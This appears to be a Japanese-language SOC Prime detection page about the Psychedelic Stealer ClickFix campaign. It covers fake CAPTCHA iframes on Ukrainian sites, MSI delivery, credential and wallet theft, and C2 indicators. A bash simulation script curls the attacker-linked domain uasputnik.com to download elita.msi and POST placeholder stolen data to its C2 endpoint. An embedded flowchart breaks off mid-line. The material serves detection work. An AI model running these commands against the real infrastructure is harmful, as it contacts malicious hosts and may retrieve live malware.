SOC Prime Bias: High

25 Sep 2026 14:16 UTC

サイケデリックスティーラー: CAPTCHAがインストーラーになるとき

Author Photo
SOC Prime Team linkedin icon フォローする
サイケデリックスティーラー: CAPTCHAがインストーラーになるとき
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

Arctic Wolf Labsは、ウクライナのビジネスウェブサイトに侵入し、偽のCloudflare CAPTCHAおとりを使用するキャンペーンを追跡しています。このClickFixスタイルの攻撃は、ユーザーにMSIパッケージを実行させ、ブラウザの資格情報、アカウントトークン、暗号通貨ウォレットデータを収集するために設計された情報スティーラー「Psychedelic Stealer」をインストールさせます。このマルウェアは、専用のC2インフラストラクチャを通じて持続的なリモートタスキングもサポートしています。

調査

調査により、正当なウクライナのウェブサイトに注入されたiframeが明らかになり、訪問者を偽の検証フローにリダイレクトしていました。アナリストはまた、コマンド設定を管理し、訪問者のテレメトリーを記録するRublevka TDSというブランドの誘導管理パネルも特定しました。MSIペイロードの技術分析では、暗号化された次のステージのURLと、認証情報やデータ盗難のためのマルウェアのコアのルーチンが明らかになりました。

軽減策

組織は、ウェブブラウザまたはコマンドラインインターフェースによって起動されるWindowsインストーラー (msiexec.exe) の不審な実行を監視する必要があります。ウェブフィルタリングは既知の悪意あるドメインをブロックすると同時に、正当なウェブ資産についても不正なiframe注入がないか監視するべきです。スケジュールされたタスクの作成に関するエンドポイントコントロールを強化することにより、持続性のリスクをさらに低減できます。

対応

Psychedelic Stealerの活動が検出された場合は、さらなるデータ流出や横方向の移動を防ぐために影響を受けたエンドポイントを隔離しましょう。ブラウザのプロファイルやローカルストレージで、侵害された資格情報、認証トークン、ウォレットデータを監査します。既知のC2インフラストラクチャとの通信のためのネットワークテレメトリーを確認し、システムに不正なスケジュールタスクや疑わしいネイティブメッセージホストがないか検査します。

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="flowchart TDn step_drive_by["T1189 – Drive-by Compromise<br>Inject iframe into legitimate websites to load malicious script from fsputnik.com"]n step_input_capture["T1056 – Input Capture<br>Use JavaScript helper to copy a malicious Windows Installer command to the clipboard via fake Cloudflare CAPTCHA"]n step_ingress_transfer["T1105 – Ingress Tool Transfer<br>Download and install Psychedelic Stealer via msiexec.exe"]n rules_for_ingress_transfer("<b>Rule Name</b>: Suspicious File Download Direct IP (via proxy)<br/><b>Rule ID</b>: 0fa3da37-f604-4547-939f-1ec135990aad")n step_persistence["T1053.005 – Scheduled Task/Job: Scheduled Task<br>Establish persistence using a scheduled task named psychedelicloveUtils"]n step_credential_theft["Steal passwords and account tokens from Chromium-based browsers"]n step_c2_communication["T1071 – Application Layer Protocol<br>Communicate with C2 server at 193.178.159.128 to retrieve tasks and payloads"]n rules_for_c2_communication("<b>Rule Name</b>: Possible C2 Communications Over HTTP To Direct IP With Uncommon Port (via proxy)<br/><b>Rule ID

攻撃フロー

検出

LOLBinセマンティクスのある疑わしいRunMRUエントリ (via registry_event)

SOC Primeチーム
2026年9月25日

リモートMSIファイルインストール試行の可能性 (via cmdline)

SOC Primeチーム
2026年9月25日

一般的でないポートによる直接IPとのHTTP経由の可能なC2通信 (via proxy)

SOC Primeチーム
2026年9月25日

直接IPによる疑わしいファイルダウンロード (via proxy)

SOC Primeチーム
2026年9月25日

検出するためのIOC (HashSha256): Psychedelic Stealer: CAPTCHAがインストーラーになるとき

SOC Prime AIルール
2026年9月25日

検出するためのIOC (SourceIP): Psychedelic Stealer: CAPTCHAがインストーラーになるとき

SOC Prime AIルール
2026年9月25日

検出するためのIOC (DestinationIP): Psychedelic Stealer: CAPTCHAがインストーラーになるとき

SOC Prime AIルール
2026年9月25日

Psychedelic Stealerインフラストラクチャアクセスの検出 [ウェブサーバー]

SOC Prime AIルール
2026年9月25日

シミュレーション実行

  • 攻撃のナラティブとコマンド: 攻撃者は、偽のCAPTCHAメカニズムを使用してターゲットを感染させることを目的としています。このシミュレーションは、被害者のブラウザの動作を模倣します:最初に攻撃者のランディングページにナビゲートして初期監視を回避し、その後、悪意あるMSIペイロードを要求し、最後に攻撃者のコントロールスクリプトへのHTTP POSTを介したC2接続を開始します。このシーケンスは、Psychedelic Stealerインフラストラクチャで特定されたURIパターンを正確に模倣するように設計されています。

  • 回帰テストスクリプト: 以下のスクリプトは curl を使用して、検出ロジックの3つの異なるステージをシミュレートします。

    #!/bin/bash
    # Psychedelic Stealerインフラストラクチャアクセスのためのシミュレーションスクリプト
    
    TARGET_DOMAIN="uasputnik.com"
    
    echo "[+] Psychedelic Stealerインフラストラクチャシミュレーションを開始します..."
    
    # ステージ1: ランディングページの訪問をシミュレート(選択肢1)
    echo "[*] ランディングページへのGETリクエストをシミュレートしています..."
    curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null
    
    # ステージ2: 悪意あるMSIのダウンロードをシミュレート(選択肢2)
    echo "[*] ペイロードのGETリクエストをシミュレートしています..."
    curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null
    
    # ステージ3: HTTP POSTを介したC2通信をシミュレート(選択肢3)
    echo "[*] C2エンドポイントへのPOSTリクエストをシミュレートしています..."
    curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null
    
    echo "[+] シミュレーション完了。SIEMでアラートを確認してください。"
  • クリーンアップコマンド:

    # これはネットワークベースのシミュレーションであるため、特に要求されない限りローカルシステムにファイルは生成されません。
    # ローカルファイルシステムのクリーンアップは不要です。
    echo "[+] クリーンアップ完了。"